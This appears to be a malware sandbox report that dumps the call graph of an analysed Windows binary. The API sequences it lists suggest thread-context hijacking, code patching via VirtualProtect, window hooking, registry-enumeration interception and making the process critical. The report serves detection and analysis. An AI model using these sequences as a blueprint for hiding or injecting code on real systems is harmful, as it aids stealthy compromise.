14085 1c56d737 14070->14085 14243 1c56eca0 14070->14243 14075 1c56d72d 14071->14075 14072 1c56d060 __free_lconv_num 13 API calls 14072->14076 14078 1c56d83a 14073->14078 14252 1c571198 14073->14252 14074 1c56d060 __free_lconv_num 13 API calls 14074->14089 14079 1c56d060 __free_lconv_num 13 API calls 14075->14079 14076->14068 14084 1c56d84c 14078->14084 14091 1c56d861 _invalid_parameter_noinfo 14078->14091 14079->14085 14080 1c56d775 14081 1c56d790 14080->14081 14082 1c56d77a 14080->14082 14087 1c56d060 __free_lconv_num 13 API calls 14081->14087 14086 1c56d060 __free_lconv_num 13 API calls 14082->14086 14088 1c56d654 52 API calls 14084->14088 14085->14074 14085->14089 14086->14085 14087->14089 14090 1c56d85c 14088->14090 14089->14072 14093 1c567e30 _invalid_parameter_noinfo 8 API calls 14090->14093 14261 1c56db38 14091->14261 14094 1c56db24 14093->14094 14094->14029 14096 1c56d8da 14273 1c56d0cc 14096->14273 14100 1c56d968 14101 1c56d654 52 API calls 14100->14101 14103 1c56d978 14101->14103 14102 1c56db38 14 API calls 14109 1c56d992 14102->14109 14103->14090 14104 1c56d060 __free_lconv_num 13 API calls 14103->14104 14104->14090 14105 1c56ef58 9 API calls 14105->14109 14107 1c56d654 52 API calls 14107->14109 14108 1c56da88 FindNextFileW 14108->14109 14111 1c56daa0 14108->14111 14109->14102 14109->14105 14109->14107 14109->14108 14110 1c56daea 14109->14110 14112 1c56d060 13 API calls __free_lconv_num 14109->14112 14295 1c56d26c 14109->14295 14114 1c56daf8 FindClose 14110->14114 14118 1c56d060 __free_lconv_num 13 API calls 14110->14118 14113 1c56dacc FindClose 14111->14113 14317 1c5708e0 14111->14317 14112->14109 14113->14090 14117 1c56dadc 14113->14117 14114->14090 14115 1c56db08 14114->14115 14119 1c56d060 __free_lconv_num 13 API calls 14115->14119 14120 1c56d060 __free_lconv_num 13 API calls 14117->14120 14118->14114 14119->14090 14120->14090 14122 1c56d83a 14121->14122 14123 1c56d818 14121->14123 14125 1c56d84c 14122->14125 14127 1c56d861 _invalid_parameter_noinfo 14122->14127 14123->14122 14124 1c571198 38 API calls 14123->14124 14124->14123 14126 1c56d654 56 API calls 14125->14126 14150 1c56d85c 14126->14150 14128 1c56db38 14 API calls 14127->14128 14131 1c56d8cb 14128->14131 14129 1c567e30 _invalid_parameter_noinfo 8 API calls 14130 1c56db24 14129->14130 14130->14029 14132 1c56d8da 14131->14132 14133 1c56ef58 9 API calls 14131->14133 14134 1c56d0cc 16 API calls 14132->14134 14133->14132 14135 1c56d93b FindFirstFileExW 14134->14135 14136 1c56d968 14135->14136 14142 1c56d992 14135->14142 14137 1c56d654 56 API calls 14136->14137 14139 1c56d978 14137->14139 14138 1c56db38 14 API calls 14138->14142 14140 1c56d060 __free_lconv_num 13 API calls 14139->14140 14139->14150 14140->14150 14141 1c56ef58 9 API calls 14141->14142 14142->14138 14142->14141 14143 1c56d26c 16 API calls 14142->14143 14144 1c56d654 56 API calls 14142->14144 14145 1c56da88 FindNextFileW 14142->14145 14146 1c56daea 14142->14146 14152 1c56d060 13 API calls __free_lconv_num 14142->14152 14143->14142 14144->14142 14145->14142 14147 1c56daa0 14145->14147 14149 1c56daf8 FindClose 14146->14149 14155 1c56d060 __free_lconv_num 13 API calls 14146->14155 14148 1c56dacc FindClose 14147->14148 14153 1c5708e0 38 API calls 14147->14153 14148->14150 14154 1c56dadc 14148->14154 14149->14150 14151 1c56db08 14149->14151 14150->14129 14156 1c56d060 __free_lconv_num 13 API calls 14151->14156 14152->14142 14153->14148 14157 1c56d060 __free_lconv_num 13 API calls 14154->14157 14155->14149 14156->14150 14157->14150 14159 1c56b92c 14158->14159 14160 1c56b964 14158->14160 14159->14160 14161 1c56cfe0 _invalid_parameter_noinfo 13 API calls 14159->14161 14160->14034 14160->14043 14162 1c56b95a 14161->14162 14163 1c56d060 __free_lconv_num 13 API calls 14162->14163 14163->14160 14168 1c570c95 14164->14168 14165 1c570c9a 14166 1c570cb0 14165->14166 14167 1c56cfb4 __free_lconv_num 13 API calls 14165->14167 14166->14043 14169 1c570ca4 14167->14169 14168->14165 14168->14166 14171 1c570ce4 14168->14171 14170 1c56ce0c _invalid_parameter_noinfo 38 API calls 14169->14170 14170->14166 14171->14166 14172 1c56cfb4 __free_lconv_num 13 API calls 14171->14172 14172->14169 14174 1c56ce3f 14173->14174 14384 1c56cb40 14174->14384 14178 1c56cce3 14177->14178 14185 1c56cd54 14178->14185 14180 1c56cd0a 14181 1c56cd2d 14180->14181 14195 1c56c1a0 14180->14195 14183 1c56cd42 14181->14183 14184 1c56c1a0 _invalid_parameter_noinfo 17 API calls 14181->14184 14183->14031 14184->14183 14208 1c56ca88 14185->14208 14190 1c56cd8f 14190->14180 14191 1c56ce2c _invalid_parameter_noinfo 17 API calls 14192 1c56ce0a 14191->14192 14193 1c56ccb8 _invalid_parameter_noinfo 38 API calls 14192->14193 14194 1c56ce25 14193->14194 14194->14180 14196 1c56c1af GetLastError 14195->14196 14197 1c56c1f8 14195->14197 14198 1c56c1c4 14196->14198 14197->14181 14199 1c56c960 _invalid_parameter_noinfo 14 API calls 14198->14199 14200 1c56c1de SetLastError 14199->14200 14200->14197 14201 1c56c201 14200->14201 14202 1c56c1a0 _invalid_parameter_noinfo 15 API calls 14201->14202 14203 1c56c227 14202->14203 14222 1c56fda8 14203->14222 14209 1c56caa4 GetLastError 14208->14209 14210 1c56cadf 14208->14210 14211 1c56cab4 14209->14211 14210->14190 14214 1c56caf4 14210->14214 14217 1c56c960 14211->14217 14215 1c56cb10 GetLastError SetLastError 14214->14215 14216 1c56cb28 14214->14216 14215->14216 14216->14190 14216->14191 14218 1c56c988 FlsGetValue 14217->14218 14220 1c56c984 14217->14220 14218->14220 14219 1c56c99e SetLastError 14219->14210 14220->14219 14221 1c56c700 _invalid_parameter_noinfo 13 API calls 14220->14221 14221->14219 14223 1c56fdc1 14222->14223 14225 1c56c24f 14222->14225 14223->14225 14230 1c570800 14223->14230 14226 1c56fe14 14225->14226 14227 1c56c25f 14226->14227 14228 1c56fe2d 14226->14228 14227->14181 14228->14227 14240 1c56e684 14228->14240 14231 1c56c870 _invalid_parameter_noinfo 14 API calls 14230->14231 14232 1c57080f 14231->14232 14238 1c570855 14232->14238 14239 1c56c318 EnterCriticalSection 14232->14239 14238->14225 14241 1c56c870 _invalid_parameter_noinfo 14 API calls 14240->14241 14242 1c56e68d 14241->14242 14244 1c56ecc2 14243->14244 14245 1c56ecdf 14243->14245 14244->14245 14246 1c56ecd0 14244->14246 14247 1c56ece9 14245->14247 14325 1c5717b0 14245->14325 14248 1c56cfb4 __free_lconv_num 13 API calls 14246->14248 14332 1c571800 14247->14332 14251 1c56ecd5 _invalid_parameter_noinfo 14248->14251 14251->14080 14253 1c5711a0 14252->14253 14254 1c5711b5 14253->14254 14255 1c5711ce 14253->14255 14256 1c56cfb4 __free_lconv_num 13 API calls 14254->14256 14257 1c5711c5 14255->14257 14259 1c56db38 14 API calls 14255->14259 14258 1c5711ba 14256->14258 14257->14073 14260 1c56ce0c _invalid_parameter_noinfo 38 API calls 14258->14260 14259->14257 14260->14257 14262 1c56d8cb 14261->14262 14263 1c56db5c 14261->14263 14262->14096 14269 1c56ef58 14262->14269 14263->14262 14264 1c56c870 _invalid_parameter_noinfo 14 API calls 14263->14264 14265 1c56db77 14264->14265 14351 1c56fd74 14265->14351 14270 1c56ef8a 14269->14270 14271 1c56ef69 14269->14271 14270->14096 14271->14270 14359 1c56ed48 14271->14359 14274 1c56d0f6 14273->14274 14275 1c56d11a 14273->14275 14279 1c56d060 __free_lconv_num 13 API calls 14274->14279 14282 1c56d105 FindFirstFileExW 14274->14282 14276 1c56d17f 14275->14276 14277 1c56d11f 14275->14277 14378 1c56ea18 14276->14378 14280 1c56d134 14277->14280 14277->14282 14283 1c56d060 __free_lconv_num 13 API calls 14277->14283 14279->14282 14284 1c56c390 14 API calls 14280->14284 14282->14100 14282->14109 14283->14280 14284->14282 14296 1c56d296 14295->14296 14297 1c56d2ba 14295->14297 14300 1c56d060 __free_lconv_num 13 API calls 14296->14300 14302 1c56d2a5 14296->14302 14298 1c56d2c0 14297->14298 14299 1c56d31f 14297->14299 14298->14302 14304 1c56d060 __free_lconv_num 13 API calls 14298->14304 14309 1c56d2d5 14298->14309 14381 1c56eaa8 14299->14381 14300->14302 14302->14109 14304->14309 14305 1c56c390 14 API calls 14305->14302 14309->14305 14318 1c570912 14317->14318 14319 1c56cfb4 __free_lconv_num 13 API calls 14318->14319 14324 1c570927 _invalid_parameter_noinfo 14318->14324 14320 1c57091c 14319->14320 14321 1c56ce0c _invalid_parameter_noinfo 38 API calls 14320->14321 14321->14324 14322 1c567e30 _invalid_parameter_noinfo 8 API calls 14323 1c570c68 14322->14323 14323->14113 14324->14322 14326 1c5717d2 HeapSize 14325->14326 14327 1c5717b9 14325->14327 14328 1c56cfb4 __free_lconv_num 13 API calls 14327->14328 14329 1c5717be 14328->14329 14330 1c56ce0c _invalid_parameter_noinfo 38 API calls 14329->14330 14331 1c5717c9 14330->14331 14331->14247 14333 1c571815 14332->14333 14334 1c57181f 14332->14334 14344 1c56c390 14333->14344 14336 1c571824 14334->14336 14342 1c57182b _invalid_parameter_noinfo 14334->14342 14339 1c56d060 __free_lconv_num 13 API calls 14336->14339 14337 1c571831 14341 1c56cfb4 __free_lconv_num 13 API calls 14337->14341 14338 1c57185e HeapReAlloc 14340 1c57181d 14338->14340 14338->14342 14339->14340 14340->14251 14341->14340 14342->14337 14342->14338 14343 1c56b230 _invalid_parameter_noinfo 2 API calls 14342->14343 14343->14342 14345 1c56c3db 14344->14345 14350 1c56c39f _invalid_parameter_noinfo 14344->14350 14347 1c56cfb4 __free_lconv_num 13 API calls 14345->14347 14346 1c56c3c2 HeapAlloc 14348 1c56c3d9 14346->14348 14346->14350 14347->14348 14348->14340 14349 1c56b230 _invalid_parameter_noinfo 2 API calls 14349->14350 14350->14345 14350->14346 14350->14349 14352 1c56db9a 14351->14352 14353 1c56fd89 14351->14353 14355 1c56fde0 14352->14355 14353->14352 14354 1c570800 _invalid_parameter_noinfo 14 API calls 14353->14354 14354->14352 14356 1c56fdf5 14355->14356 14357 1c56fe08 14355->14357 14356->14357 14358 1c56e684 _invalid_parameter_noinfo 14 API calls 14356->14358 14357->14262 14358->14357 14360 1c56ee38 14359->14360 14371 1c56ed7d __vcrt_FlsAlloc 14359->14371 14377 1c56c318 EnterCriticalSection 14360->14377 14362 1c56eda2 LoadLibraryExW 14365 1c56eec7 14362->14365 14366 1c56edc7 GetLastError 14362->14366 14364 1c56eee0 GetProcAddress 14364->14360 14365->14364 14367 1c56eed7 FreeLibrary 14365->14367 14366->14371 14367->14364 14371->14360 14371->14362 14371->14364 14375 1c56ee01 LoadLibraryExW 14371->14375 14375->14365 14375->14371 14379 1c56ea21 MultiByteToWideChar 14378->14379 14382 1c56eacc WideCharToMultiByte 14381->14382 14385 1c56cb7a _invalid_parameter_noinfo 14384->14385 14386 1c56cba2 RtlCaptureContext RtlLookupFunctionEntry 14385->14386 14387 1c56cc24 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14386->14387 14388 1c56cbee RtlVirtualUnwind 14386->14388 14389 1c56cc76 _invalid_parameter_noinfo 14387->14389 14388->14387 14390 1c567e30 _invalid_parameter_noinfo 8 API calls 14389->14390 14391 1c56cc95 GetCurrentProcess TerminateProcess 14390->14391 15241 1c56bf98 15242 1c56bfc9 15241->15242 15243 1c56bfb1 15241->15243 15243->15242 15244 1c56d060 __free_lconv_num 13 API calls 15243->15244 15244->15242 14392 1c56ac02 14393 1c5690e4 __CxxCallCatchBlock 9 API calls 14392->14393 14395 1c56ac0f __CxxCallCatchBlock 14393->14395 14394 1c56ac53 RaiseException 14396 1c56ac7a 14394->14396 14395->14394 14405 1c569738 14396->14405 14398 1c56acab __CxxCallCatchBlock 14399 1c5690e4 __CxxCallCatchBlock 9 API calls 14398->14399 14400 1c56acbe 14399->14400 14402 1c5690e4 __CxxCallCatchBlock 9 API calls 14400->14402 14404 1c56acc7 14402->14404 14406 1c5690e4 __CxxCallCatchBlock 9 API calls 14405->14406 14407 1c56974a 14406->14407 14408 1c569785 14407->14408 14409 1c5690e4 __CxxCallCatchBlock 9 API calls 14407->14409 14410 1c569755 14409->14410 14410->14408 14411 1c5690e4 __CxxCallCatchBlock 9 API calls 14410->14411 14412 1c569776 14411->14412 14412->14398 14413 1c568db8 14412->14413 14414 1c5690e4 __CxxCallCatchBlock 9 API calls 14413->14414 14415 1c568dc6 14414->14415 14415->14398 14661 1c574582 14662 1c569738 __CxxCallCatchBlock 9 API calls 14661->14662 14663 1c574595 14662->14663 14667 1c568db8 __CxxCallCatchBlock 9 API calls 14663->14667 14669 1c5745d4 __CxxCallCatchBlock 14663->14669 14664 1c5690e4 __CxxCallCatchBlock 9 API calls 14665 1c5745e8 14664->14665 14666 1c5690e4 __CxxCallCatchBlock 9 API calls 14665->14666 14668 1c5745f8 14666->14668 14667->14669 14669->14664 14573 1c56fd00 14574 1c56fd0b 14573->14574 14582 1c5729e4 14574->14582 14595 1c56c318 EnterCriticalSection 14582->14595 14748 1c56f200 GetProcessHeap 15245 1c567f80 15246 1c567f89 __scrt_acquire_startup_lock 15245->15246 15248 1c567f8d 15246->15248 15249 1c56b974 15246->15249 15250 1c56b994 15249->15250 15277 1c56b9ad 15249->15277 15251 1c56b9b2 15250->15251 15252 1c56b99c 15250->15252 15253 1c56e624 56 API calls 15251->15253 15254 1c56cfb4 __free_lconv_num 13 API calls 15252->15254 15256 1c56b9b7 15253->15256 15255 1c56b9a1 15254->15255 15257 1c56ce0c _invalid_parameter_noinfo 38 API calls 15255->15257 15278 1c56dcf8 GetModuleFileNameW 15256->15278 15257->15277 15262 1c56b914 13 API calls 15263 1c56ba21 15262->15263 15264 1c56ba3a 15263->15264 15265 1c56ba29 15263->15265 15267 1c56b754 14 API calls 15264->15267 15266 1c56cfb4 __free_lconv_num 13 API calls 15265->15266 15268 1c56ba2e 15266->15268 15270 1c56ba56 15267->15270 15269 1c56d060 __free_lconv_num 13 API calls 15268->15269 15269->15277 15270->15268 15271 1c56ba86 15270->15271 15272 1c56ba9f 15270->15272 15273 1c56d060 __free_lconv_num 13 API calls 15271->15273 15274 1c56d060 __free_lconv_num 13 API calls 15272->15274 15275 1c56ba8f 15273->15275 15274->15268 15276 1c56d060 __free_lconv_num 13 API calls 15275->15276 15276->15277 15277->15248 15279 1c56dd51 15278->15279 15280 1c56dd3d GetLastError 15278->15280 15282 1c56db38 14 API calls 15279->15282 15296 1c56cf44 15280->15296 15283 1c56dd7f 15282->15283 15284 1c56ef58 9 API calls 15283->15284 15289 1c56dd90 15283->15289 15284->15289 15285 1c567e30 _invalid_parameter_noinfo 8 API calls 15287 1c56b9ce 15285->15287 15290 1c56b754 15287->15290 15288 1c56dd4a 15288->15285 15301 1c56dbdc 15289->15301 15292 1c56b792 15290->15292 15294 1c56b7f8 15292->15294 15318 1c56e9dc 15292->15318 15293 1c56b8e5 15293->15262 15294->15293 15295 1c56e9dc 14 API calls 15294->15295 15295->15294 15315 1c56cf90 15296->15315 15298 1c56cf51 __free_lconv_num 15299 1c56cfb4 __free_lconv_num 13 API calls 15298->15299 15300 1c56cf61 15299->15300 15300->15288 15302 1c56dc1b 15301->15302 15304 1c56dc00 15301->15304 15303 1c56dc20 15302->15303 15305 1c56eaa8 WideCharToMultiByte 15302->15305 15303->15304 15307 1c56cfb4 __free_lconv_num 13 API calls 15303->15307 15304->15288 15306 1c56dc77 15305->15306 15306->15303 15308 1c56dc7e GetLastError 15306->15308 15309 1c56dca9 15306->15309 15307->15304 15310 1c56cf44 13 API calls 15308->15310 15311 1c56eaa8 WideCharToMultiByte 15309->15311 15312 1c56dc8b 15310->15312 15314 1c56dcd0 15311->15314 15313 1c56cfb4 __free_lconv_num 13 API calls 15312->15313 15313->15304 15314->15304 15314->15308 15316 1c56c8d0 __free_lconv_num 13 API calls 15315->15316 15317 1c56cf99 15316->15317 15317->15298 15319 1c56e968 15318->15319 15320 1c56db38 14 API calls 15319->15320 15321 1c56e98c 15320->15321 15321->15292 15072 1c57470f 15073 1c57471e 15072->15073 15074 1c574728 15072->15074 15076 1c56c36c LeaveCriticalSection 15073->15076 14416 1c56800c 14417 1c568030 __scrt_acquire_startup_lock 14416->14417 14418 1c56b341 14417->14418 14419 1c56c8d0 __free_lconv_num 13 API calls 14417->14419 14420 1c56b36a 14419->14420 14670 1c565d8c 14671 1c565d93 14670->14671 14672 1c565cd0 14671->14672 14673 1c565dc0 VirtualProtect 14671->14673 14673->14672 14674 1c565de9 GetLastError 14673->14674 14674->14672 15042 1c563288 15043 1c5632b8 15042->15043 15044 1c563371 15043->15044 15045 1c5632d5 PdhGetCounterInfoW 15043->15045 15045->15044 15046 1c5632f3 GetProcessHeap HeapAlloc PdhGetCounterInfoW 15045->15046 15047 1c563325 StrCmpW 15046->15047 15048 1c56335d GetProcessHeap HeapFree 15046->15048 15047->15048 15050 1c56333a 15047->15050 15048->15044 15049 1c563720 12 API calls 15049->15050 15050->15048 15050->15049 15077 1c56ab08 15078 1c5690e4 __CxxCallCatchBlock 9 API calls 15077->15078 15079 1c56ab3d 15078->15079 15080 1c5690e4 __CxxCallCatchBlock 9 API calls 15079->15080 15081 1c56ab4b __except_validate_context_record 15080->15081 15082 1c5690e4 __CxxCallCatchBlock 9 API calls 15081->15082 15083 1c56ab8f 15082->15083 15084 1c5690e4 __CxxCallCatchBlock 9 API calls 15083->15084 15085 1c56ab98 15084->15085 15086 1c5690e4 __CxxCallCatchBlock 9 API calls 15085->15086 15087 1c56aba1 15086->15087 15100 1c5696fc 15087->15100 15090 1c5690e4 __CxxCallCatchBlock 9 API calls 15091 1c56abd1 __CxxCallCatchBlock 15090->15091 15092 1c569738 __CxxCallCatchBlock 9 API calls 15091->15092 15096 1c56ac82 15092->15096 15093 1c56acab __CxxCallCatchBlock 15094 1c5690e4 __CxxCallCatchBlock 9 API calls 15093->15094 15095 1c56acbe 15094->15095 15097 1c5690e4 __CxxCallCatchBlock 9 API calls 15095->15097 15096->15093 15098 1c568db8 __CxxCallCatchBlock 9 API calls 15096->15098 15099 1c56acc7 15097->15099 15098->15093 15101 1c5690e4 __CxxCallCatchBlock 9 API calls 15100->15101 15102 1c56970d 15101->15102 15103 1c569718 15102->15103 15104 1c5690e4 __CxxCallCatchBlock 9 API calls 15102->15104 15105 1c5690e4 __CxxCallCatchBlock 9 API calls 15103->15105 15104->15103 15106 1c569729 15105->15106 15106->15090 15106->15091 14749 1c574608 14752 1c568e0c 14749->14752 14753 1c568e36 14752->14753 14754 1c568e24 14752->14754 14756 1c5690e4 __CxxCallCatchBlock 9 API calls 14753->14756 14754->14753 14755 1c568e2c 14754->14755 14757 1c568e34 14755->14757 14759 1c5690e4 __CxxCallCatchBlock 9 API calls 14755->14759 14758 1c568e3b 14756->14758 14758->14757 14760 1c5690e4 __CxxCallCatchBlock 9 API calls 14758->14760 14761 1c568e5b 14759->14761 14760->14757 14762 1c5690e4 __CxxCallCatchBlock 9 API calls 14761->14762 14763 1c568e68 14762->14763 14764 1c56c0b4 14 API calls 14763->14764 14765 1c568e71 14764->14765 14766 1c56c0b4 14 API calls 14765->14766 14767 1c568e7d 14766->14767 13608 7ffb4adfb6a9 13609 7ffb4adfb6b4 13608->13609 13610 7ffb4adfb7e2 RtlSetProcessIsCritical 13609->13610 13611 7ffb4adfb842 13610->13611 14421 1c562c34 14423 1c562c88 14421->14423 14422 1c562ca3 14423->14422 14425 1c5635c4 14423->14425 14426 1c56365a 14425->14426 14428 1c5635e9 14425->14428 14426->14422 14427 1c563d4c StrCmpNIW 14427->14428 14428->14426 14428->14427 14429 1c561e04 StrCmpIW StrCmpW 14428->14429 14429->14428 14500 1c5744b5 14501 1c5690e4 __CxxCallCatchBlock 9 API calls 14500->14501 14502 1c5744cd 14501->14502 14503 1c5690e4 __CxxCallCatchBlock 9 API calls 14502->14503 14504 1c5744e8 14503->14504 14505 1c5690e4 __CxxCallCatchBlock 9 API calls 14504->14505 14506 1c5744fc 14505->14506 14507 1c5690e4 __CxxCallCatchBlock 9 API calls 14506->14507 14508 1c57453e 14507->14508 15107 1c565734 15108 1c56573a 15107->15108 15119 1c567d60 15108->15119 15113 1c565837 _invalid_parameter_noinfo 15115 1c5659bd 15113->15115 15118 1c56579e 15113->15118 15132 1c567940 15113->15132 15114 1c565abb 15115->15114 15116 1c565b37 VirtualProtect 15115->15116 15117 1c565b63 GetLastError 15116->15117 15116->15118 15117->15118 15120 1c567d6b 15119->15120 15121 1c56577d 15120->15121 15122 1c56b230 _invalid_parameter_noinfo 2 API calls 15120->15122 15123 1c567d8a 15120->15123 15121->15118 15128 1c5641c0 15121->15128 15122->15120 15124 1c567d95 15123->15124 15138 1c568578 15123->15138 15142 1c568598 15124->15142 15129 1c5641dd 15128->15129 15131 1c56424c _invalid_parameter_noinfo 15129->15131 15146 1c564430 15129->15146 15131->15113 15133 1c567987 15132->15133 15171 1c567710 15133->15171 15136 1c567e30 _invalid_parameter_noinfo 8 API calls 15137 1c5679b1 15136->15137 15137->15113 15139 1c568586 std::bad_alloc::bad_alloc 15138->15139 15140 1c568f38 Concurrency::cancel_current_task 2 API calls 15139->15140 15141 1c568597 15140->15141 15143 1c5685a6 std::bad_alloc::bad_alloc 15142->15143 15144 1c568f38 Concurrency::cancel_current_task 2 API calls 15143->15144 15145 1c567d9b 15144->15145 15147 1c564454 15146->15147 15153 1c564477 15146->15153 15147->15153 15160 1c563ee0 15147->15160 15148 1c5644ad 15149 1c5644dd 15148->15149 15154 1c564010 2 API calls 15148->15154 15152 1c564513 15149->15152 15157 1c563ee0 3 API calls 15149->15157 15155 1c56452f 15152->15155 15158 1c563ee0 3 API calls 15152->15158 15153->15148 15166 1c564010 15153->15166 15154->15149 15156 1c56454b 15155->15156 15159 1c564010 2 API calls 15155->15159 15156->15131 15157->15152 15158->15155 15159->15156 15161 1c563f01 _invalid_parameter_noinfo 15160->15161 15162 1c563f56 VirtualQuery 15161->15162 15163 1c563f70 15161->15163 15164 1c563f8a VirtualAlloc 15161->15164 15162->15161 15162->15163 15163->15153 15164->15163 15165 1c563fbb GetLastError 15164->15165 15165->15161 15165->15163 15169 1c564028 _invalid_parameter_noinfo 15166->15169 15167 1c564097 15167->15148 15168 1c56407d VirtualQuery 15168->15167 15168->15169 15169->15167 15169->15168 15170 1c5640e2 GetLastError 15169->15170 15170->15167 15170->15169 15172 1c56772b 15171->15172 15173 1c567741 SetLastError 15172->15173 15174 1c56774f 15172->15174 15173->15174 15174->15136 14430 1c568432 14433 1c568e80 14430->14433 14432 1c56845d 14434 1c568ed6 14433->14434 14435 1c568ea1 14433->14435 14434->14432 14435->14434 14437 1c56c0e8 14435->14437 14438 1c56c0f5 14437->14438 14439 1c56c0ff 14437->14439 14438->14439 14444 1c56c11a 14438->14444 14440 1c56cfb4 __free_lconv_num 13 API calls 14439->14440 14441 1c56c106 14440->14441 14442 1c56ce0c _invalid_parameter_noinfo 38 API calls 14441->14442 14443 1c56c112 14442->14443 14443->14434 14444->14443 14445 1c56cfb4 __free_lconv_num 13 API calls 14444->14445 14445->14441 13628 1c56f130 VirtualProtect 14768 1c56f630 14769 1c56f660 14768->14769 14771 1c56f687 14768->14771 14770 1c56c8d0 __free_lconv_num 13 API calls 14769->14770 14769->14771 14776 1c56f674 14769->14776 14770->14776 14772 1c56f75c 14771->14772 14791 1c56c318 EnterCriticalSection 14771->14791 14775 1c56f873 14772->14775 14778 1c56f7c3 14772->14778 14784 1c56f78a 14772->14784 14773 1c56f6c4 14779 1c56f880 14775->14779 14793 1c56c36c LeaveCriticalSection 14775->14793 14776->14771 14776->14773 14777 1c56f709 14776->14777 14780 1c56cfb4 __free_lconv_num 13 API calls 14777->14780 14788 1c56f821 14778->14788 14792 1c56c36c LeaveCriticalSection 14778->14792 14783 1c56f70e 14780->14783 14785 1c56ce0c _invalid_parameter_noinfo 38 API calls 14783->14785 14784->14778 14786 1c56c870 _invalid_parameter_noinfo 14 API calls 14784->14786 14785->14773 14787 1c56f7b3 14786->14787 14789 1c56c870 _invalid_parameter_noinfo 14 API calls 14787->14789 14790 1c56c870 14 API calls _invalid_parameter_noinfo 14788->14790 14789->14778 14790->14788 13669 7ffb4adfbe21 13670 7ffb4adfbe27 SetWindowsHookExW 13669->13670 13672 7ffb4adfbff1 13670->13672 14675 1c56c9bc 14680 1c56f160 14675->14680 14677 1c56c9c5 14678 1c56c8d0 __free_lconv_num 13 API calls 14677->14678 14679 1c56c9e2 __vcrt_uninitialize_ptd 14677->14679 14678->14679 14681 1c56f175 14680->14681 14682 1c56f171 14680->14682 14681->14682 14683 1c56ed48 9 API calls 14681->14683 14682->14677 14683->14682 14794 1c57363c 14795 1c573674 __GSHandlerCheckCommon 14794->14795 14796 1c5736a0 14795->14796 14798 1c5697e4 14795->14798 14799 1c5690e4 __CxxCallCatchBlock 9 API calls 14798->14799 14800 1c56980e 14799->14800 14801 1c5690e4 __CxxCallCatchBlock 9 API calls 14800->14801 14802 1c56981b 14801->14802 14803 1c5690e4 __CxxCallCatchBlock 9 API calls 14802->14803 14804 1c569824 14803->14804 14804->14796 13673 1c563fb9 13674 1c563f06 _invalid_parameter_noinfo 13673->13674 13675 1c563f56 VirtualQuery 13674->13675 13676 1c563f8a VirtualAlloc 13674->13676 13677 1c563f70 13674->13677 13675->13674 13675->13677 13676->13677 13678 1c563fbb GetLastError 13676->13678 13678->13674 13678->13677 14684 1c565db9 14685 1c565dc0 VirtualProtect 14684->14685 14686 1c565de9 GetLastError 14685->14686 14687 1c565cd0 14685->14687 14686->14687 14688 1c56f1a4 14689 1c56f1dd 14688->14689 14691 1c56f1ae 14688->14691 14690 1c56f1c3 FreeLibrary 14690->14691 14691->14689 14691->14690 14692 1c5731a4 14693 1c5731b5 CloseHandle 14692->14693 14694 1c5731bb 14692->14694 14693->14694 14695 1c5661a3 14696 1c5661b0 14695->14696 14697 1c5661bc GetThreadContext 14696->14697 14704 1c56631a 14696->14704 14698 1c5661e2 14697->14698 14697->14704 14703 1c566209 14698->14703 14698->14704 14699 1c566341 VirtualProtect FlushInstructionCache 14699->14704 14700 1c5663fe 14701 1c56641e 14700->14701 14705 1c5648e0 VirtualFree 14700->14705 14702 1c5652f0 3 API calls 14701->14702 14710 1c566423 14702->14710 14706 1c56628d 14703->14706 14707 1c566266 SetThreadContext 14703->14707 14704->14699 14704->14700 14705->14701 14707->14706 14708 1c566477 14711 1c567e30 _invalid_parameter_noinfo 8 API calls 14708->14711 14709 1c566437 ResumeThread 14709->14710 14710->14708 14710->14709 14712 1c5664bf 14711->14712 13679 1c562aa0 NtEnumerateKey 13680 1c562b4c 13679->13680 13682 1c562aec 13679->13682 13681 1c562afe NtEnumerateKey 13681->13682 13682->13680 13682->13681 13683 1c563d4c StrCmpNIW 13682->13683 13683->13682 14596 1c567d20 14597 1c567d41 14596->14597 14598 1c567d3c 14596->14598 14600 1c567e50 14598->14600 14601 1c567ee7 14600->14601 14602 1c567e73 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14600->14602 14601->14597 14602->14601 14518 1c5704a0 14519 1c5704b9 14518->14519 14520 1c5704a9 14518->14520 14521 1c56cfb4 __free_lconv_num 13 API calls 14520->14521 14522 1c5704ae 14521->14522 14523 1c56ce0c _invalid_parameter_noinfo 38 API calls 14522->14523 14523->14519 15175 1c573720 15185 1c568a60 15175->15185 15177 1c573748 15179 1c5690e4 __CxxCallCatchBlock 9 API calls 15180 1c573758 15179->15180 15181 1c5690e4 __CxxCallCatchBlock 9 API calls 15180->15181 15182 1c573761 15181->15182 15183 1c56c0b4 14 API calls 15182->15183 15184 1c57376a 15183->15184 15187 1c568a90 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 15185->15187 15186 1c568b91 15186->15177 15186->15179 15187->15186 15188 1c568b54 RtlUnwindEx 15187->15188 15188->15187 13684 1c56242c GetProcessIdOfThread GetCurrentProcessId 13685 1c562457 CreateFileW 13684->13685 13686 1c5624d2 NtResumeThread 13684->13686 13685->13686 13687 1c56248b WriteFile ReadFile CloseHandle 13685->13687 13687->13686 14713 1c56b5aa 14714 1c56c0b4 14 API calls 14713->14714 14715 1c56b5af 14714->14715 14716 1c56b5d5 GetModuleHandleW 14715->14716 14717 1c56b61f 14715->14717 14716->14717 14721 1c56b5e2 14716->14721 14730 1c56b4b8 14717->14730 14721->14717 14725 1c56b6c4 GetModuleHandleExW 14721->14725 14726 1c56b6f8 GetProcAddress 14725->14726 14727 1c56b70a 14725->14727 14726->14727 14728 1c56b722 14727->14728 14729 1c56b71b FreeLibrary 14727->14729 14728->14717 14729->14728 14742 1c56c318 EnterCriticalSection 14730->14742

                                                                                                                                  Executed Functions

                                                                                                                                  Function 1C562DD0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 252stringfilelibraryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
